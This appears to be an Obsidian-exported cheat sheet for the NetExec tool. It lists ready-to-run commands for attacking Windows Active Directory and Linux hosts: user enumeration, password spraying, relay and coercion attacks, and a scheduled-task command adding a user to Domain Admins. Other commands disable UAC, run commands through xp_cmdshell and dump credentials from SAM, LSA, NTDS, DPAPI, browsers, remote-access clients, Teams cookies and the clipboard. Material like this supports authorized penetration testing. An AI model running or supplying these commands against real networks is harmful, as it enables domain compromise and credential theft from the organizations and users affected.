NetExec

Latest Windows and Linux versions can be downloaded from here.

New techniques can be found on this Twitter profile.

Official wiki.

Info

Most of these modules require local administrator privileges.

Low privilege

Enumeration

List users:

nxc ldap $IP -u username -p 'password' --users

RID brute force:

nxc mssql $IP -u username -p 'password' --rid-brute

Create wordlist for password spray or ASREP-roast:

nxc smb $IP -d domain.local -u username -p 'password --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users

LDAP queries:

nxc ldap $IP -u username -p 'password' --query "(sAMAccountName=username)" ""

User description:

nxc ldap $IP -u username -p 'password' -M get-desc-users

Check groups:

nxc ldap $IP -u username -p 'password' --groups

Multiple users enumeartion:

nxc ldap $IP -u username -p 'password' --users user1 user2

BloodHound ingestor:

nxc smb $IP -u username -p 'password' --bloodhound -c All

Password policy check:

nxc ldap $IP -u username -p 'password' -M pso

nxc ldap $IP -u username -p 'password' --pass-pol

RDP screenshot, when NLA is disabled:

nxc ldap $IP --nla-screenshot

Password change:

nxc smb $IP -u username -p 'password' -M change-password -o USER=target NEWPASS=password

User information:

nxc wmi $IP -u username -p 'password' --wmi "SELECT * FROM Win32_UserAccount"

Task manager:

nxc smb $IP -u username -p 'password' --tasklist

Windows Defender settings:

nxc smb $IP -u username -p 'password' -M wcc

Subnet enumeration:

nxc smb $IP -u username -p 'password' --interfaces

Directory listing:

nxc smb $IP -u username -p 'password' --share SHARE --dir "directory"

Read files:

nxc smb $IP -u username -p 'password' -M notepad++

WebDAV service status check:

nxc smb $IP -u username -p 'password' -M webdav

AD CS enumeration:

nxc smb $IP -u username -p 'password' -M certipy_find

Privilege escalation

SMB relay:

nxc smb scope.txt --gen-relay-list targets.txt

Creating shortcut files on SMB shares, for Responder:

nxc smb $IP -u username -p 'password' -M slinky

Password spray, it can also be used for RDP and WinRM protocols:

nxc smb $IP -u username -p passwords.txt --continue-on-success

Channel binding:

nxc ldap $IP -u username -p 'password' -M ldap-checker

Certificate authentication:

nxc ldap $IP -d domain.local -u username --pfx-cert user.pfx

Coercion for ESC8:

nxc smb $IP -u username -p 'password' -M coerce_plus -o M=petitpotam L=$IP

MachineAccountQuota check:

nxc smb $IP -u username -p 'password' -M maq

Computer domain join:

nxc smb $IP -u username -p 'password' add-computer

NTLM reflection:

nxc ldap $IP -u username -p 'password' -M ntlm_reflection

Pre-Windows 2000:

nxc ldap $IP -u username -p 'password' -M pre2k

Coercion with all techniques combined (PetitPotam, DFSCoerce, MSEven, ShadowCoerce and PrinterBug):

nxc smb $IP -u username -p 'password' -M coerce_plus -o LISTENER=$IP

SMB Ghost vulnerability check:

nxc smb $IP -M smbghost

Enumerating old Windows servers:

nxc smb $IP -u username -p 'password' -M obsolete

Timeroasting obtains NT hash form any computer account:

nxc smb $IP -M timeroast

Credential dump

Group Policy password check:

nxc smb $IP -u username -p 'password' -M gpp_password

File share enumeration:

nxc smb $IP -u username -p 'password' -M spider_plus -o DOWNLOAD_FLAG=True

High privilege

Enumeration

PowerShell command execution:

nxc smb $IP -u username -p 'password' -X ipconfig --force-ps32

SCCM enumeration:

nxc smb $IP -u username -p 'password' --sccm

nxc smb $IP -u username -p 'password' -M sccm -o REC_RESOLVE=TRUE

nxc smb $IP -u username -p 'password' -M sccm-recon6 --dns-server $IP

LAPS enumeration:

nxc smb $IP -u username -p 'password' --laps

File transfer over SSH:

nxc ssh $IP -u username -p 'password' --put-file test.txt /tmp/test.txt

Privilege escalation

Add user to Domain Admins group in the context of logged on Domain Admin users. Sessions can be checked with --loggedon-users or --reg-sessions parameter.

nxc smb $IP -u username -p password -M schtask_as -o USER=DA CMD="powershell.exe net group \"Domain Admins\" user /add /domain"

Impersonate logged on users by abusing AD CS. NT hash is obtained over PKINIT:

nxc smb $IP -u username -p 'password' -M masky -o CA= ADCS.domain.local\ADCS-CA

Token impersonation, automatically escalates privileges:

nxc smb $IP -u username -p 'password' -M impersonate

Enumerate delegations:

nxc ldap $IP -u username -p 'password' --find-delegation

nxc smb $IP -u username -p 'password' --delegate administrator

Disable UAC:

nxc smb $IP -u username -p 'password' -M remote-uac -o ACTION=disable

Check RDP sessions:

nxc smb $IP -u username -p 'password' --qwinsta

Enable RDP:

nxc smb $IP -u username -p 'password' -M rdp

Shadow RDP:

nxc smb $IP -u username -p 'password' -M shadowrdp -o ACTION=disable

MSSQL enumeration and exploitation:

nxc mssql $IP -u username -p 'password' -M mssql_priv

MSSQL coercion:

nxc mssql $IP -u username -p 'password' -M mssql_coerce -o L=$IP

Executing SQL queries:

nxc mssql $IP -u username -p 'password' -q 'SELECT name FROM master.dbo.sysdatabases;'

Execute commands with xp_cmdshell:

nxc mssql $IP -u username -p 'password' -x command

File download:

nxc mssql $IP -u username -p 'password' --get-file output target

NFS escape to root:

nxc nfs $IP --get-file '/etc/passwd' etc_passwd

nxc nfs $IP --ls

Credential dump

SAM dump, updated version doesn’t touch the disk.

nxc smb $IP -u username -p 'password' --sam --lsa --dpapi --ntds

DPAPI hash dump:

nxc smb $IP -u username -p 'password' --local-auth -M dpapi_hash -o "OUTPUTFILE=hashes.txt"

Check autologon credentials in registry:

nxc smb $IP -u username -p 'password' -M reg-winlogon

Backup operator privileges, useful for NTDS dump:

nxc smb $IP -u username -p 'password' -M backup_operator

NTDS.dit dump:

nxc smb $IP -u username -p 'password' -M ntdsutil

nxc smb $IP -u username -p 'password' -M ntds-dump-raw

Veeam SQL database dump:

nxc smb $IP -u username -p 'password' -M veeam

Firefoxa credentials dump:

nxc smb $IP -u username -p 'password' -M firefox

Dump credentials from remote access applications:

nxc smb $IP -u username -p 'password' -M putty

nxc smb $IP -u username -p 'password' -M winscp

nxc smb $IP -u username -p 'password' -M vnc

nxc smb $IP -u username -p 'password' -M mremoteng

nxc smb $IP -u username -p 'password' -M mobaxterm

PowerShell history enumeration:

nxc smb $IP -u username -p 'password' -M powershell_history

KeePass process and database enumeration:

nxc smb $IP -u username -p 'password' -M keypass_discover

Microsoft Teams cookie dump:

nxc smb $IP -u username -p 'password' -M teams_localdb

Check credentials in EventViewer logs:

nxc smb $IP -u username -p 'password' -M eventlog_creds

Recent files enumeration:

nxc smb $IP -u username -p 'password' -M recent_files

Clipboard dump:

nxc smb $IP -u username -p 'password' -M snipped

Find passwords in IIS Application Pool config:

nxc smb $IP -u username -p 'password' -M iis

Exctract password for gMSA account over LDAPS:

nxc smb $IP -u username -p 'password' --gmsa

nxc smb $IP -u username -p 'password' --gmsa-decrypt-lsa user

Obsidian

Explorer

NetExec

Low privilege

Enumeration

Privilege escalation

Credential dump

High privilege

Enumeration

Privilege escalation

Credential dump

Graph View

Table of Contents